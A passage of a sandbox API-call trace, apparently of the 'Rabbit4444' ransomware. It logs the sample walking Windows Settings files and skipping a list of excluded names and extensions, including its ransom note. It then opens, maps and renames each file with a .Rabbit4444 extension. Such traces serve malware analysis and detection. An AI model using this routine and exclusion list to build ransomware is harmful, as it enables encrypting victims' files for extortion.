lpString2="ids.txt") returned -1 [0056.431] lstrcmpiW (lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.431] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms" | out: lpString1="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms") returned="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms" [0056.431] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.431] lstrlenW (lpString="AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms") returned 53 [0056.431] lstrlenW (lpString="Rabbit4444") returned 10 [0056.431] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.431] lstrlenW (lpString=".dll") returned 4 [0056.431] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.431] lstrlenW (lpString=".lnk") returned 4 [0056.431] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.431] lstrlenW (lpString=".ini") returned 4 [0056.431] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.431] lstrlenW (lpString=".sys") returned 4 [0056.431] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.432] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppowerandsleepsleep.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.432] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.432] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14774252651) returned 1 [0056.432] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1160) returned 1 [0056.432] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0056.432] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0056.432] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x298 [0056.433] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x70000 [0056.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0056.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0056.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0056.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0056.434] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14774508038) returned 1 [0056.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0056.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0056.434] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.435] CloseHandle (hObject=0x298) returned 1 [0056.435] CloseHandle (hObject=0x278) returned 1 [0056.435] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms.Rabbit4444") returned 181 [0056.435] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppowerandsleepsleep.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPowerAndSleepSleep.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgrouppowerandsleepsleep.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.435] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4c7ea39, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf4c7ea39, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23969bec, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x498, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", cAlternateFileName="AAF226~1.SET")) returned 1 [0056.435] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.436] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.436] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.436] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2=".") returned 1 [0056.436] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2="..") returned 1 [0056.436] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2="windows") returned -1 [0056.436] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.436] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.436] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2="boot") returned -1 [0056.436] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.436] lstrcmpiW (lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.436] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms" | out: lpString1="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms") returned="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms" [0056.436] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.436] lstrlenW (lpString="AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms") returned 57 [0056.436] lstrlenW (lpString="Rabbit4444") returned 10 [0056.436] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.436] lstrlenW (lpString=".dll") returned 4 [0056.436] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.436] lstrlenW (lpString=".lnk") returned 4 [0056.436] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.436] lstrlenW (lpString=".ini") returned 4 [0056.436] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.436] lstrlenW (lpString=".sys") returned 4 [0056.436] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.436] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupprivacylocationhistory.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.437] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.437] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14774742724) returned 1 [0056.437] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1176) returned 1 [0056.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0056.437] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0056.437] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0056.438] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0056.439] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.439] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.439] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0056.439] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0056.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.439] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14774985932) returned 1 [0056.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0056.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0056.439] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.439] CloseHandle (hObject=0x298) returned 1 [0056.439] CloseHandle (hObject=0x278) returned 1 [0056.439] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms.Rabbit4444") returned 185 [0056.439] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupprivacylocationhistory.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupPrivacyLocationHistory.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupprivacylocationhistory.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.444] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf58908df, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf58908df, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a4ea03, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", cAlternateFileName="AA3E8B~1.SET")) returned 1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2=".") returned 1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2="..") returned 1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2="windows") returned -1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2="boot") returned -1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.444] lstrcmpiW (lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.444] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms" | out: lpString1="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms") returned="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms" [0056.444] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.445] lstrlenW (lpString="AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms") returned 56 [0056.445] lstrlenW (lpString="Rabbit4444") returned 10 [0056.445] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.445] lstrlenW (lpString=".dll") returned 4 [0056.445] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.445] lstrlenW (lpString=".lnk") returned 4 [0056.445] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.445] lstrlenW (lpString=".ini") returned 4 [0056.445] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.445] lstrlenW (lpString=".sys") returned 4 [0056.445] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.445] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupregiondatetimeformats.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.445] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.445] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14775606599) returned 1 [0056.445] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1174) returned 1 [0056.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.445] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0056.445] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7a0, lpName=0x0) returned 0x298 [0056.448] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7a0) returned 0x70000 [0056.448] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.448] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.449] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.449] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.449] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.449] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.449] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.449] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.449] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14775974533) returned 1 [0056.449] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.449] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0056.449] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.449] CloseHandle (hObject=0x298) returned 1 [0056.449] CloseHandle (hObject=0x278) returned 1 [0056.449] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms.Rabbit4444") returned 184 [0056.450] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupregiondatetimeformats.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupRegionDateTimeFormats.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupregiondatetimeformats.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.450] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5d7b68d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xf5d7b68d, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x471, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", cAlternateFileName="AAC29B~1.SET")) returned 1 [0056.450] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.450] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.450] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.450] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2=".") returned 1 [0056.450] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2="..") returned 1 [0056.450] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2="windows") returned -1 [0056.450] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.450] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.450] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2="boot") returned -1 [0056.451] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.451] lstrcmpiW (lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.451] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms" | out: lpString1="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms") returned="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms" [0056.451] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.451] lstrlenW (lpString="AAA_SettingsGroupSpeechMicrophone.settingcontent-ms") returned 51 [0056.451] lstrlenW (lpString="Rabbit4444") returned 10 [0056.451] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.451] lstrlenW (lpString=".dll") returned 4 [0056.451] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.451] lstrlenW (lpString=".lnk") returned 4 [0056.451] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.451] lstrlenW (lpString=".ini") returned 4 [0056.451] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.451] lstrlenW (lpString=".sys") returned 4 [0056.451] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.451] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupspeechmicrophone.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.451] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.451] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14776215700) returned 1 [0056.451] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1137) returned 1 [0056.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0056.452] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0056.452] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0056.453] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0056.453] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.453] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0056.453] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.453] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0056.454] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0056.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0056.454] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14776464857) returned 1 [0056.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0056.454] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0056.454] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.454] CloseHandle (hObject=0x298) returned 1 [0056.454] CloseHandle (hObject=0x278) returned 1 [0056.454] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms.Rabbit4444") returned 179 [0056.454] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsGroupSpeechMicrophone.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingsgroupspeechmicrophone.settingcontent-ms"), 